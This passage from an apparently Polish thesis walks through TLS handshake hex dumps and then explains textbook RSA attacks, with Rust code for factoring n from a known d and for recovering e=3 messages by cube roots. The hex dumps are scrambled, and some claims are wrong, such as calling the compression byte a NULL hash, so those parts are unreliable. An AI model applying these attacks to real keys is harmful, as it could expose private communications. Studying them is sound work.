      00000165    8d 1c ae c8 7a 29 4f ca    a1 ef a0 bd 8d 7a 24 85
                                                               ....z)0. ....z$.
      00000175 48 b1 24 16 a6 38 19 c4 8e 08 20 03 bc 92 83 ed
                                                               Н.$..8.. .. ....
```

```
26
       00000185
                 51 38 15 c9 36 b7 b0 e5
                                            1d a0 96 3c 95 a7 4c 3e
                                                                        Q8..6... ...<..L>
27
                 79 a8 ea f5 d5 15 da 87
                                            d7 b4 6a 03 eb 49 05 24
                                                                        y..... ... j... I.$
                                                                        FZ^..~5. L..e...j
                                            4c 9b a3 65 8f cd db 6a
28
       000001A5
                 46 5a 5e ae 89 7e 35 82
29
       000001B5
                 99 5a b6 95 92 fa c7 1d
                                            7c ec 77 1d 5c 33 8c 7b
                                                                        .Z..... | .w.\3.{
30
       000001C5
                 80 f4 1d 8a 90 81 61 94
                                            49
                                               ed
                                                  81 e6
                                                         е9
                                                            7c e4 f1
                                                                        .....a. I....|..
31
       000001D5
                 4c c5 11 02 49 22 0e e4
                                            90 56
                                                     f9 9c 9d 14 27
                                                                        L...I"... .~.....,
                                                  07
32
       000001E5
                 06 0b fb 4c c4 ee 06 18
                                                                        ...L.....CyQG
                                            ea 94
                                                                        ..bW:L.F R.N..@>t
33
       000001F5
                 18 ba 62 57 3a 4c af 46
                                            52 f9 4e
                                                     07
                                                         d8 40
                                                               3e 74
34
       00000205
                 2c 89 36 dd 4a 1a fe aa
                                            83
                                               е9
                                                  c1 04
                                                         ab
                                                            69
                                                               41 16
                                                                        ,.6.J... ....iA.
35
       00000215
                           57
                              41
                                 6c 78 fe
                                                     22
                                                         88
                                                                        .aUWAlx. X.-"...&
       00000225
                              29 16 8a f0
                                            de 5e d4 30 93 13 2e 0b
                                                                        ..j.)... .^.0....
36
                 a8 c3 6a b7
37
       00000235
                 15 29 c7 31 e0 f0 18 b9
                                            08 d9 2e d9 b5 3d 77 32
                                                                        .).1....=w2
38
       00000245
                 15 f5 07 Of fd 8b ff 92
                                            58 77 37 56 50 4f e8 2a
                                                                        ..... Xw7VPO.*
                                                                        ...QOT..._R.....
       00000255
                                            fc 5f 52 8d 02 03 01 00
39
                 e5 07 06 51 30 54 ec 03
       00000265
                              5e 30 1f 06
                                                     23
                                                         04 18
                                                                        ...'0~0.. .U.#..0.
40
                 01 a3 60
                           30
                                            03 55 1d
                                                               30 16
                                                                        ....-6.+ . '?....
41
       00000275
                 80 14 9a f9 2d 36 1c 2b
                                            11 27 3f 1a b3 1c c0 f3
42
       00000285
                          e3 d7 ff 30 09
                                            06 03 55
                                                     1d 13 04 02 30
                                                                        ].....0. ......0
43
       00000295
                 00 30
                       11 06 03 55 1d 11
                                            04 0a 30
                                                     08 82 06 64 6f
                                                                        .0...U.. ..0...do
                                                                        main0.... U.....!
       000002A5
                 6d 61 69 6e 30 1d 06 03
                                            55 1d 0e 04 16 04 14 21
44
45
       000002B5
                        0е
                           b8
                              e6 55 51 73
                                               a9
                                                      6d
                                                         fc 87
                                                               8f 2f
                                                                        .....UQs ..nm.../
       000002C5
                 cd 3a 04 30 0d 06 09 2a
                                               48 86
                                                         0d 01 01 0b
                                                                        .:.0...* .H.....
46
                                            86
                                                     f7
       000002D5
                 05 00 03 82 01 01 00 1c
47
                                            18 8f cd ec ae 41 2e 99
                                                                        . . . . . . . . . . . . . . A . .
                                                                        .#6...{. .-"|....
48
       000002E5
                 cb 23 36 a9 f8 10 7b c1
                                            c5 2d 22 7c a6 d9 c2 a4
       000002F5
                                                                        .....ld. .t....j.
49
                 a5 0c d7 03 82 6c 64 fa
                                            87 74 f9 e5 f7 ff 6a 06
       00000305
                 56 d8 a3 7b
                              e2 03 dd 30
                                                     01 5b 1e
                                                                        V..{...0 ....[.9\
50
                                                  b5
                                                               39 5c
                                                                        ..%../K. d......
       00000315
                 f3 0e 25 d2 cf 2f 4b 0a
                                            64
                                                  0b 8a ed bd 1f c7
51
                                               18
                                                                        ..c.z... ....~b..
52
       00000325
                 f1 0a 63 98 7a aa 13 d7
                                            09 d4 8f b7
                                                        7e 62 af c9
       00000335
                 64 81 3e 2d 61 5b 37 1d
                                                                        d.>-a[7. 0.-..-..
       00000345
                 44 10 4e dc 45 7a 62 e2
                                            90 31 Oc e6 b9 d5
                                                               99 2a
                                                                        D.N.Ezb. .1....*
54
                                            14
                                                                        G....^.6 .(...k.5
55
       00000355
                 47 e0 10 e2 0a 5e 1f 36
                                               28
                                                  d9
                                                      е5
                                                         da
                                                            6b f2 35
       00000365
                 7d 09
                        02 44
                              c8 4d 59 d0
                                            4 f
                                               4 a
                                                  65
                                                     35
                                                        f8 60
                                                               6d 94
                                                                        }..D.MY. OJe5.'m.
56
                                                                        ...c.6.. .....$7
       00000375
                 bd f8 f2 63 12 36 a1 9b
57
                                            02 d5 bf ef 86 fe 24 37
       00000385
                 59 d0 12 d1 b1 f5 bf 42
                                            18 b5 e8 18 6c 26 a3 bc
                                                                        Y.....B ....1&..
                 82 5d 1c 29 b7 26 fd ed
                                            8b dd ca 82 82 da de af
                                                                        .].).&.. ......
59
       00000395
                                                                        7 \dots G \dots wFy = .
60
       000003A5
                 37 ab d8 02 47 04 2d 0a
                                            d7 d3 f8 77 46 79 3d 8f
61
       000003B5
                    7 c
                        01 f6 82 ca 99 87
                                               cb 65 ea 4c d9 4a 2f
                                                                        ; | . . . . . . . e . L . J/
                                            ee 4d 90 24 bc 99 19 e6
62
       000003C5
                 8d 53 88 65 68 57 74 13
                                                                        .S.ehWt. .M.$....
63
       000003D5
                 b4 1b
                       10 e2 8b 18
                                                                        . . . . . Y
       000003DC
                 16 03 03 00 04 0e
                                    00 00
                                            00
64
                                                                        . . . . . . . .
```

W tych danych można wyróżnić trzy bloki.

Blok pierwszy - ServerHello

Pierwsze 5 bajtów służy, jak poprzednio, do wyznaczenia wersji połączenia i długości pozostałej wiadomości.

Kolejny bajt 0x02 identyfikuje początek bloku zwanego *ServerHello*. Następne trzy bajty 0x00004c są ponownie długością pozostałej wiadomości, a za nimi znajduje się wersja SSL/TLS (0x0303). Jak poprzednio 32 bajty przeznaczone są dla

losowej wartości wybranej przez serwera (bajt od 0x8F do 0xE1).

Pojawiają się teraz dane dotyczące identyfikatora połączenia. Długość tego identyfikatora to 0x20, czyli 32 bajty. Dane zawierające identyfikator są od 0xBC do 0x50. Trzy kolejne bajty wyznaczają wybrane szyfrowanie, gdzie pierwsze dwa to identyfikator szyfrogramu, a ostatni bajt to funkcja skrótu. W tym przypadku 0x003C odpowiada za TLS_RSA_WITH_AES_128_CBC_SHA256, a 0x00 odpowiada za funkcję skrótu NULL, czyli brak zastosowania funkcji skrótu.

Pozostałe bajty tego bloku przeznaczone są dla dodatków.

Blok drugi - Certyfikat

Drugi blok zawiera dane dotyczące certfykifatu serwera. Pierwsze 5 bajtów jest jak poprzednio. Następny bajt 0x0B identyfikuje protokół TLS Handshake, w szczególności wymiana certyfikatu. Trzy kolejne bajty wyznaczają długość certyfikatu, a następne trzy długość łańcucha certyfikatów. Muszą się różnić o trzy bajty. W tym przypadku 0x00037E i 0x00037B różnią się o 3 bajty.

Pozostałe dane są certyfikatem serwera.

Blok trzeci - ServerHelloDone

Ostatni blok, najkrótszy, służy do powiadomienia klienta, że dane dobiegły końca. Serwer w dalszym ciągu będzie oczekiwał na dane od klienta w celu dokończenia połączenia SSL/TLS. Pierwsze 5 bajtów są jak poprzednio. 0x0E wyznacza początek bloku ServerHelloDone, a następne trzy bajty wyznaczają długość pozostałych bajtów. Długość 0x000000 jest zerowa, zatem nie ma dalszych danych.

2.2.3. Client key exchange

Po otrzymaniu od serwera danych wcześniej przedstawionych, klient oblicza i wysyła dane poniżej przedstawione.

```
0000009A 16 03 03 01 06 10 00 01 02 01 00 49 2d ab 7c 1f
                                                           000000AA 1d 33 db d1 d6 db e7 57 c8 ec 47 31 f4 3c bf 43
                                                           .3....W ..G1.<.C
3 000000BA 94 16 85 6d b2 65 97 07 59 e7 d8 43 9f 8e 46 cc
                                                           ...m.e.. Y..C..F.
4 000000CA a1 8b c7 28 df e0 67 93 03 d2 66 c1 44 ea 05 e4
                                                           ...(..g. ..f.D...
5 000000DA 51 2c 6f 23 42 d6 09 e4 36 37 6a 72 8d cd a7 6f
                                                           Q,o#B... 67jr...o
6 000000EA 4a 75 01 c2 ef 8b 45 a8
                                  39 e9 3a 5a 07 6b 29 35
                                                           Ju....E. 9.:Z.k)5
 000000FA 3d 4d 9e 15 59 06 6c d4 61 21 8c c1 8e e2 89 7d
                                                           =M..Y.1. a!....}
 0000010A b9 e7 f7 d6 66 9b 66 54 2f 4a 2d d0 9c ac f1 99
                                                           ....f.fT /J-....
9 0000011A 4f 49 67 61 01 0d 5f a2 83 3a 9c 27 2f 64 74 6a
                                                           OIga.._. .:.'/dtj
```

```
10 0000012A 24 c4 b8 a9 9c e2 a3 df b8 68 9f 23 9b 73 6e 6a
                                                             $.....h.#.snj
11 0000013A fa 2a a6 d0 a4 94 3c 94 25 f8 19 f4 87 4d 5f be
                                                              .*....<. %....M_.
12 0000014A 0c 97 a0 33 e3 1e dc d9 5b 46 c4 b1 88 37 22 14
                                                              ...3.... [F...7".
13 0000015A 80 07 22 4c a8 c8 da d7 4f 48 06 48 d4 d5 3e 8a
                                                              .."L.... OH.H..>.
14 0000016A 73 74 aa cd 55 b2 64 bc 77 73 40 7b 96 6e 2a 72
                                                              st..U.d. ws@{.n*r
                                                              .9NT.[.. ..s6..f.
15 0000017A e7 39 4e 54 f2 5b b7 cc eb c5 73 36 cc d0 66 e1
16 0000018A 35 38 2e cb 50 29 38 f5 35 a5 1f f0 74 95 5a 64
                                                              58..P)8. 5...t.Zd
                                                              J....m.. j..
17 0000019A 4a 1f b6 88 d1 6d c5 0c 6a da a7
```

Pierwsze 5 bajtów jest jak poprzednio. Następnie bajt 0x10 wyznacza protokół SSL/TLS w szczególności wymiana klucza klienta. Trzy bajty za tym (0x000102) są długością pozostałej wiadomości. Bajty po tej długości są nazywane *PreMasterSecret* i zawierają informacje na temat klucza do komunikacji. Te dane są szyfrowane kluczem publicznym serwera, który został doręczony poprzez *ServerHello*. Ponadto, te dane są formatowane według PKCS #1. To formatowanie zostanie omówione w kolejnych rozdziałach.

2.2.4. Change cipher spec

Klient dodatkowo wysyła blok danych, który został nazwany *ChangeCipherSpec*. Te dane są szyfrowane kluczem, który będzie wykorzystywany do dalszej komunikacji. Poniżej został ten blok przedstawiony.

Pierwsze sześć bajtów dedykowane są protokołowi zmiany szyfrogramu. Bajt 0x14 jest identyfikatorem tego protokołu. Kolejne dwa bajty są wersją SSL/TLS, a dwa następne są długością wiadomości. Jest to 0x0001 czyli wiadomość o długości jednego bajta. Ten bajt to 0x01.

Pierwsze pięć bajtów jest jak w poprzednich przypadkach. Kolejne dane są zaszyfrowaną wiadomością. Składają się z konkatenacji dwóch funkcji skrótu, MD5 i SHA-1. Skrót obliczany jest na postawie wiadomości dotychczas wysłanych, odebranych i innych wartości. Protokół jest przez to wytrzymały na atak z pośrednikiem (ang. man-in-the-middle), ponieważ skracane dane są posiadanie przez serwera i klienta osobno. W protokole SSL v3 natomiast wysyłane były skróty MD5 i SHA-1 wiadomości oraz blok weryfikacyjny.

Serwer, po otrzymaniu tego bloku danych, wysyła także *ChangeCipherSpec* formatowany w podobny sposób. Dane te zostały poniżej przedstawione.

```
000003E5
              14 03 03 00 01 01
2
     000003EB 16 03 03 00 50 17 58 86 dd f0 a1 fe 06 a5 f8 34
                                                                 ....P.X. .....4
     000003FB 88 9a b2 25 16 bc 17 3b 96 05 44 0e c0 53 8a 3a
3
                                                                 ...%...; ..D..S.:
                                                                 ....E.r. ....=B.d
     0000040B 07 b9 d9 e2 45 fb 72 e0 89 95 db b3 3d 42 ce 64
4
              81 fe 65 87 82 2c 75 02
                                       b6 c4 ba ca 52 d3 10 6d
                                                                 ..e.,u. ....R..m
6
     0000042B
              08 ae 6a fa 32 18 e6 23 df b6 70 9f 31 51 cc 05
                                                                 ..j.2..# ..p.1Q..
     0000043B f7 86 43 ea be
```

Szyfrowane dane są sprawdzanie przez klienta i serwera aby potwierdzić poprawną wymianę klucza.

2.3. Dane aplikacji

Jeżeli serwer i klient przejdą przez kroki wcześniej omówione bez żadnego problemu, to wysyłane wiadomości będą szyfrowane ustalonym kluczem. Poniżej takie dane zostały przedstawione.

```
00000200
           17 03 03 00 40 1c 1e 03 69 63 ec 92 f7 c1 c6 55
                                                             ....@... ic.....U
2 00000210 fc 66 7b 96 1c 13 74 8d 65 e7 36 16 f6 c0 04 cc
                                                              .f{...t. e.6....
3 00000220 1f fb b5 97 5d a1 ae a8 84 92 6e 6a e8 3c e0 67
                                                              ....]... ..nj.<.g
           10 b8 3d c8 eb 69 a8 67 Oa e2 ff 95 db a3 5e 7a
  00000230
                                                              ..=..i.g .....^z
  00000240 c8 53 92 18 65
                                                              .S..e
      00000440 17 03 03 00 40 15 c8 1b 0b 99 72 cc 7d a6 29 09
                                                                 ....@... ..r.}.).
7
      00000450 af af 3c 8e 40 28 33 1d 3e be 14 65 64 d7 c5 37
                                                                 ..<.@(3. >..ed..7
      00000460 9c e3 80 34 08 10 f3 f2 ee a2 2b f4 ec 1e 68 d8
8
                                                                  ...4.... ..+...h.
9
      00000470
               49 ec 70 e6 ce 53 9b db ee e9 fe 97 fa 88 f6 95
                                                                 I.p..S.. ......
10
      00000480 c5 00 54 92 1e
                                                                  ..T..
```

Dane wyjustowane do lewej strony są danymi wysłanymi przez klienta do serwera. Pozostałe dane są danymi wysłanymi przez serwera do klienta.

Pierwszy bajt 0x17 wyznacza protokół aplikacji danych protokołu SSL/TLS. Kolejne dwa bajty 0x0303 są wersją protokołu, a następujące dwa 0x0040 są długością wiadomości. Ostatnie 20 lub 16 bajtów przeznaczone są do weryfikacji. Bajty pośrodku są zaszyfrowane kluczem ustalonym poprzez SSL Handshake.

2.4. Alerty SSL/TLS

Jeżeli wystąpią błędy w trakcie komunikacji, weryfikacji danych lub inne, może zostać wysłany blok danych który nazywany jest *SSL Alert*. Składa się on z bajtu 0x15, który wyznacza protokół alertów protokołu SSL/TLS. Kolejne dwa bajty będą

wersją protokołu, a następne dwa długością wiadomości. W tej wiadomości pierwszy bajt będzie wyznaczał typ błędu, kolejne dwa bajty będą długością, a za tymi może się znaleźć dalsza informacja o błędzie.

3. Wybrane ataki na system RSA

W tym rodziale przedstawiono wybrane ataki na system RSA. Dla niektórych przedstawiono też przykład z implementacją w kodzie. Przykłady te można uruchomić korzystając z programu zapisanego jako ssl_attack. Ponieważ program został skompilowany na systemie Unix, może być konieczna rekompilacja.

3.1. Rozkład dużych liczb

W systemie RSA liczba n w kluczu publicznym jest iloczynem dwóch liczb pierwszych. Tę liczby nie są znane innym użytkownikom natomiast potrzebne są do obliczenia klucza prywatnego i publicznego. Znając rozkład liczby n można obliczyć $\varphi(n)$, które służy do wyznaczania kluczy.

Rozłożenie dużych liczb naturalnych na czynniki pierwsze jest niezwykle trudne. Istnieją algorytmy szukające dzielników danej liczby, które działają szybciej niż dzielenie liczby n przez wszystkie liczby od niej mniejsze. Te algorytmy są jednak za wolne, żeby w odpowiednio krótkim czasie rozłożyć dużą liczbę n.

Istnieją takie liczby n=pq, gdzie p i q są pierwsze, dla których znalezienie rozkładu jest znacznie szybsze niż dla dowolnego iloczynu liczb pierwszych. W ogólności, jeżeli da się rozłożyć liczbę n systemu RSA w krótkim czasie, to system ten zostaje złamany.

Fakt 3.1. [3] Niech para (n, e) będzie kluczem publicznym systemu RSA. Jeżeli jest znany rozkład liczby n, to można łatwo obliczyć klucz prywatny d. Jeżeli natomiast znana jest liczba d, to możliwe jest rozłożenie liczby n.

Ponieważ znany jest rozkład liczby n, to znana jest też wartość funkcji $\varphi(n)$. Z klucza publicznego znana jest liczba e co oznacza, że można obliczyć klucz prywatny d z równości

$$ed = 1 \pmod{\varphi(n)}$$
.

Do tego można wykorzystać rozszerzony algorytm Euklidesa którego implementacja została przedstawiona poniżej.

```
pub fn euclides(a: i128, b: i128) -> (i128, i128, i128) {
2
      let mut x1: i128 = 1;
      let mut y1: i128 = 0;
3
4
      let mut x2: i128 = 0;
5
      let mut y2: i128 = 1;
6
      let mut q: i128;
       let mut r1: i128 = a;
8
      let mut r2: i128 = b;
9
       while r2 != 0 {
10
           q = r1 / r2;
           (r1, r2) = (r2, r1 \% r2);
11
12
           (x1, x2) = (x2, x1 - x2 * q);
13
           (y1, y2) = (y2, y1 - y2 * q);
14
       return (r1, x1, y1);
15
16 }
17
  pub fn euclides_gmp(a: Integer, b: Integer) -> (Integer, Integer, Integer) {
18
19
       let mut x1: Integer = Integer::from(1);
       let mut y1: Integer = Integer::from(0);
20
      let mut x2: Integer = Integer::from(0);
21
22
       let mut y2: Integer = Integer::from(1);
23
       let mut q: Integer;
      let mut tmp: Integer;
24
      let mut r1: Integer = a;
25
26
      let mut r2: Integer = b;
27
       while r2 != 0 {
28
           tmp = r2.clone();
           (q, r2) = r1.div_rem(r2);
29
30
           r1 = tmp;
           (x1, x2) = (x2.clone(), x1 - x2 * q.clone());
31
32
           (y1, y2) = (y2.clone(), y1 - y2 * q);
33
       return (r1, x1, y1);
34
35 }
```

Listing 3.1. ./ssl attack/src/lib.rs od 28 do 62

Jeżeli natomiast znana jest liczba d, to należy obliczyć k=ed-1. Z definicji klucza publicznego i prywatnego wiadomo, że $ed=1\pmod{\varphi(n)}$. Oznacza to, że liczba k jest krotnością liczby $\varphi(n)$. Ponieważ ta liczba jest parzysta, to k można zapisać jako $k=2^tr$, gdzie $t\geq 1$ i r jest nieparzyste. Z twierdzenia Eulera wynika ponadto, że $g^k=1$ dla każdej liczby $g\in 0,1,\ldots,n-1$ względnie pierwszej z n. Oznacza to, że $g^{k/2}$ jest pierwiastkiem z jedności modulo n. Z chińskiego twierdzenia o resztach, liczba 1 ma cztery pierwiastki modulo iloczyn dwóch różnych liczb pierwszych. Dwa z nich są trywialne: ± 1 . Pozostałe dwa są równe $\pm x$, gdzie liczba

x spełnia następujące warunki:

$$\begin{cases} x = 1 \pmod{p}, \\ x = -1 \pmod{q}. \end{cases}$$

Obliczając NWD(x-1,n) lub NWD(x+1,n), to ujawniony zostaje jeden z dzielników n, czyli rozkład tej liczby. Za liczbę x podstawiana jest liczba $g^{k/2^i}$ dla $i=1,2,\ldots,t$. Jedna z tych liczb da nam szukane dzielniki.

Przykład

Niech kluczem publicznym systemu RSA będzie (n, e) oraz kluczem publicznym będzie d definiowane następująco:

n=1226490591781626370002351544839377770896755 2173712358109109112075721236843318505659070 8512714409978021061721803238743089377017125 2334700978282673811298115272118177831278631 9011587166390909385674403046948259826198367 1636847777109062306704031853586998589720620 5423627992254553582169107812833048282157887 28105359,

 $e = 84617501727888423821133596441571121520815397 \\ 64322508993444443634950268151893529355553176 \\ 68245730984973725643733072885360358550027836 \\ 39020298535325660076402607034399890585937330 \\ 74789453257322202213902881306468325875198276 \\ 78558737928425470774472264432568908814208258 \\ 29634680197242864699416061217480750109412593,$

d = 65537.

Przyjęto liczbę g=3. Na podstawie powyższego algorytmu i korzystając z kodu przedstawionego poniżej, znaleziono dzielniki liczby n. Są to:

$$\begin{split} p = &101580982521687223733614505860249961016617080 \\ &683998026776387071010688914124676530944235111 \\ &787000117469428117686781373184946572991308926 \\ &66639682293044016167, \end{split}$$

$$\begin{split} q = &120740178066280708051466531963407769267805436\\ &654569674267262798361292789200655919705988398\\ &343870059984992350359568336187592423358833745\\ &94751399006688831577. \end{split}$$

```
fn factor_n_example() {
2
     3
     4
5
     163684777710906230670403185358699858972062054236279922545535821691078128330482\\
     8215788728105359";
6
    let e_str: &str = "84617501727888423821133596441571121520815397643225089934444
     9
     298535325660076402607034399890585937330747894532573222022139028813064683258751
10
     480750109412593";
11
12
    let n: Integer = n_str.parse::<Integer>().unwrap();
    let e: Integer = e_str.parse::<Integer>().unwrap();
13
    let d: Integer = Integer::from(65537);
14
15
     let k: Integer = e*d - Integer::from(1);
16
     let mut t_int: u16 = 0;
17
    let mut r: Integer = k.clone();
18
     while r.is_even() {
19
20
        r = r/2;
21
        t_int += 1;
22
     }
23
    let t: Integer = Integer::from(t_int);
24
     println!("k = 2^{{}} * {} * {}, t, r);
25
     let mut x: Integer;
26
27
    let mut p: Integer;
28
    let mut q: Integer;
29
     for i in 1..t_int {
        let tmp = &k / Integer::from((2 as u32).pow(i.into()));
30
        x = Integer::from(3).pow_mod(&tmp, &n).unwrap();
31
32
        p = (&x - Integer::from(1)).gcd(&n);
33
        q = (&x + Integer::from(1)).gcd(&n);
       if p.clone() == Integer::from(1) || q.clone() == Integer::from(1) {
```

Listing 3.2. ./ssl attack/src/main.rs od 114 do 154

3.2. Wspólny moduł [3]

Aby uniknąć problemu związanego z tworzeniem nowej wartości n dla klucza publicznego systemu RSA, urząd certyfikacji może zastosować tą samą liczbę n dla wielu użytkowników, tworząc inne klucze publiczne i prywatne. Dla użytkownika i zostanie więc stworzony klucz publiczny (n, e_i) oraz klucz prywatny d_i . Użytkownik k nie może odszyfrować bezpośrednio wiadomości szyfrowanej kluczem publicznym użytkownika i. Natomiast, jak wcześniej pokazano, użytkownik k może znaleźć rozkład liczby n korzystając z klucza publicznego e_k i prywatnego d_k . Wtedy jest możliwe obliczenie $\varphi(n)$ oraz, ponieważ n jest takie same dla wielu użytkowników, klucza prywatnego d_i korzystając z metody generacji kluczy.

3.3. Atak z wybranym szyfrogramem [3]

System RSA jest wrażliwy na atak z wybranym szyfrogramem (ang. blinding). Niech użytkownicy A i B posługują się komunikacją RSA z ustalonym kluczem publicznym (n,e) i kluczem prywatnym d należącym tylko do użytkownika A. Niech ponadto użytkownik O dysponuje zaszyfrowaną wiadomością c która odpowiada wiadomości m. Użytkownik O wybiera liczbę s i tworzy nowy szyfrogram postaci $c' = s^e c \pmod{n}$. Następnie pyta użytkownika A o odszyfrowanie tej wiadomości. Zakładając, że A ją odszyfruje, ponieważ nie wygląda groźnie, użytkownik O może odczytać wiadomość m:

$$m' = (c')^d \pmod{n} = (s^e c)^d \pmod{n} = s \cdot m \pmod{n}$$

czyli

$$m = m's^{-1} \pmod{n}$$

3.4. Mały wykładnik publiczny

Dla przyspieszenia szyfrowania można dobrać mały wykładnik e, czyli klucz publiczny. Jest to natomiast niebezpieczne dla systemu RSA. Za mały wykładnik uznawane są liczby mniejsze równe 65537. Korzysta się w tym przypadku z twierdzenia Coppersmitha, które zostało podane poniżej:

Twierdzenie 3.1 (Coppersmith). [3] Niech $n \in \mathbb{Z}$ oraz $f \in \mathbb{Z}[x]$ będzie unormowanym wielomianem stopnia d. Niech ponadto $X = n^{\frac{1}{d}-\epsilon}$ dla pewnego $\epsilon > 0$. Wtedy, znając (n, f) użytkownik M może znaleźć wszystkie liczby całkowite $|x_0| < X$ spełniające równanie $f(x_0) = 0 \pmod{n}$. Czas działania jest identyczny do czasu działania algorytmu redukcji bazy sieci (LLL)

Twierdzenie to podaje algorytm do znalezienia pierwiastków modulo n danego wielomianu. Wykorzystywana metoda to algorytm redukcji bazy sieci LLL, który bierze nazwę od twórców L. Lovasz, A. Lenstra i H. Lenstra Jr. Algorytm ten jest wykorzystywany powszechnie w atakach na inne systemy kryptograficzne. Nie zostanie on natomiast tutaj rozważany.

Rozważony zostanie teraz atak na system RSA, gdzie dla klucza publicznego wybrano liczbę e=3. Atak ten polega na zauważeniu, że część całkowita pierwiastka trzeciego stopnia jest szukanym pierwiastkiem. Należy natomiast rozważyć dwa przypadki.

Niech (n,3) będzie kluczem publicznym systemu RSA, a d kluczem prywatnym. Niech ponadto m będzie wiadomością którą będzie szyfrowana. Jeżeli $c=m^3 < n$, to $m=\lfloor c^{1/3} \rfloor$. Jeżeli natomiast $c=m^3 \geq n$, to $m^3=k\cdot n+c$ dla pewnego $k\in\mathbb{Z}$. Zatem $m=\lfloor (c+k\cdot n)^{1/3} \rfloor$ dla pewnego $k\in\mathbb{Z}$. Ostatecznie, można sprawdzać kolejno wartości k aż do momentu uzyskania wiadomości ze sensem, lub wiadomości w szukanym formacie.

3.4.1. Przykład z implementacją

Niech kluczem publicznym systemu RSA będzie para (n, e) zdefiniowana w następujący sposób:

 $n = 29331922499794985782735976045591164936683059380558950386560\\ 16010574034320151336993900630753116592270894961916269862367\\ 53490304308595478257089947083218037053094594380993404277705\\ 80064400911431856656901982789948285309956111848686906152664\\ 47335094048650745177122343583526016897121008747089444846074\\ 55939568405865305279158025414500929465746948095848808966013\\ 17519794442862977471129319781313161842056501715040555964011\\ 89958900286373086867952718442078901055147506786290773905496\\ 61831206214072463985180989811064312192076978702934121764404\\ 82900183550467375190239898455201170831410460483829448603477\\ 361305838743852756938687673,$

e = 3.

Na podstawie informacji wcześniej przedstawionej, wypróbowano wartości k od 1 do 10000 w celu odszyfrowania tajnej wiadomości. Poniżej przedstawiono kod programu.

```
fn small_public_exponent() {
2
    let n_str: &str = "29331922499794985782735976045591164936683059380558950386560
3
    160105740343201513369939006307531165922708949619162698623675349030430859547825\\
    5
6
    745593956840586530527915802541450092946574694809584880896601317519794442862977
    8
    551475067862907739054966183120621407246398518098981106431219207697870293412176
9
    10
    756938687673";
11
    let n: Integer = n_str.parse::<Integer>().unwrap();
12
    let e: Integer = Integer::from(3);
13
14
    let message: &str = "Super secret message";
15
    let m: Integer = Integer::from_digits(message.as_bytes(), Order::MsfBe);
16
    let c: Integer = m.pow_mod(&e, &n).unwrap();
17
    println!("Here is your ciphertext: {}", c);
18
19
    let (res, k) = small_e(n, c, e);
    println!("Decrypted message: {}", res);
```

```
21
       println!("k is: {}", k);
22
       pub fn small_e(n: Integer, c: Integer, e: Integer) -> (String, i32) {
23
24
           let mut arr: Vec<u8>;
           let mut m: Integer;
25
26
27
           for i in 0..10000 {
               m = c.clone() + i*n.clone();
28
29
               m = m.root(e.to_u32_wrapping());
30
               arr = m.to_digits::<u8>(Order::MsfBe);
               let mut str: String = String::new();
31
32
               for j in arr.clone() {
33
                    str.push(j as char);
34
               if str.is_ascii() {
35
36
                    return (str,i);
37
38
           return (String::from(""), -1);
39
40
41
   }
```

Listing 3.3. ./ssl attack/src/main.rs od 72 do 112

Uzyskano tajną wiadomość "Super secret message" oraz wartość k=0.

3.5. Mały wykładnik prywatny

Aby przyspieszyć czas odszyfrowania, można dobrać mały klucz prywatny d. Jest to natomiast problem dla systemu RSA, ponieważ możliwe jest odgadnięcie klucza prywatnego korzystając z twierdzenia podanego poniżej.

Twierdzenie 3.2 (M. Wiener). [3] Niech n = pq gdzie $q . Niech ponadto <math>d < \frac{1}{3}n^{1/4}$. Wtedy dla $ed = 1 \pmod{\varphi(n)}$ można uzyskać d.

Dowód tego twierdzenia polega na pewnych zależnościach aproksymacyjny oraz na ułamkach łańcuchowych. Wiadomo, że jeżeli $ed = 1 \pmod{\varphi(n)}$, to $ed = k \cdot \varphi(n) + 1$ czyli $ed - k \cdot \varphi(n) = 1$. Wtedy można zapisać:

$$\left| \frac{e}{\varphi(n)} - \frac{k}{d} \right| = \frac{1}{d \cdot \varphi(n)}$$

W języku ułamków łańcuchowych oznacza to, że $\frac{k}{d}$ jest przybliżeniem ułamka $\frac{e}{\varphi(n)}$ z błędem $\frac{1}{d\cdot \varphi(n)}$.

Dalej, z definicji funkcji Eulera wiadomo, że $\varphi(n) = (p-1)(q-1) = n-p-q+1$. Ponadto $p+q-1 < 3\sqrt{n}$, co oznacza, że $|n-\varphi(n)| < 3\sqrt{n}$. Zatem atakujący może wykorzystać n na miejscu $\varphi(n)$, co pozwala na dalsze rozważania. Wtedy:

$$\left| \frac{e}{n} - \frac{k}{d} \right| = \left| \frac{ed - kn}{nd} \right|$$

$$= \left| \frac{ed - k\varphi(n) - kn + k\varphi(n)}{nd} \right|$$

$$= \left| \frac{1 - k(n - \varphi(n))}{nd} \right| \le \left| \frac{k \cdot 3\sqrt{n}}{nd} \right| = \frac{3k}{d\sqrt{n}}$$

Ponieważ $k\varphi(n)=ed-1$ oraz $e<\varphi(n)$, to k< d. Z założeń twierdzenia wiadomo, że $d<\frac{1}{3}n^{1/4}$. Oznacza to, że nierówność powyżej jest postaci:

$$\left| \frac{e}{n} - \frac{k}{d} \right| \le \frac{3k}{d\sqrt{n}} \le \frac{3\frac{1}{3}n^{1/4}}{dn^{1/2}} = \frac{1}{dn^{1/4}} < \frac{1}{3d^2}$$

Zatem $\frac{k}{d}$ jest przybliżeniem ułamka $\frac{e}{N}$. Te przybliżenia można wyznaczyć korzystając z reduktorów ułamków łańcuchowych.

3.5.1. Przykład z implementacją

Niech kluczem publicznym systemu RSA będzie para (n, e) zdefiniowana w następujący sposób:

- $n = 12264905917816263700023515448393777708967552173712358109109 \\ 11207572123684331850565907085127144099780210617218032387430 \\ 89377017125233470097828267381129811527211817783127863190115 \\ 87166390909385674403046948259826198367163684777710906230670 \\ 40318535869985897206205423627992254553582169107812833048282 \\ 15788728105359,$
- $e = 84617501727888423821133596441571121520815397643225089934444 \\ 43634950268151893529355553176682457309849737256437330728853 \\ 60358550027836390202985353256600764026070343998905859373307 \\ 47894532573222022139028813064683258751982767855873792842547 \\ 07744722644325689088142082582963468019724286469941606121748 \\ 0750109412593.$

Za pomocą tego klucza zaszyfrowano tajną wiadomość. Na podstawie twierdzenia Wienera oraz korzystając z kodu przedstawionego poniżej, wyznaczono klucz prywatny oraz odszyfrowano wiadomość.

```
fn small_private_exponent() {
     let n_str: \&str = "12264905917816263700023515448393777708967552173712358109109
3
     4
     5
     8215788728105359";
6
     let e_str: &str = "84617501727888423821133596441571121520815397643225089934444
     436349502681518935293555531766824573098497372564373307288536035855002783639020\\
8
     9
10
     480750109412593";
11
12
     let n: Integer = n_str.parse::<Integer>().unwrap();
     let e: Integer = e_str.parse::<Integer>().unwrap();
13
14
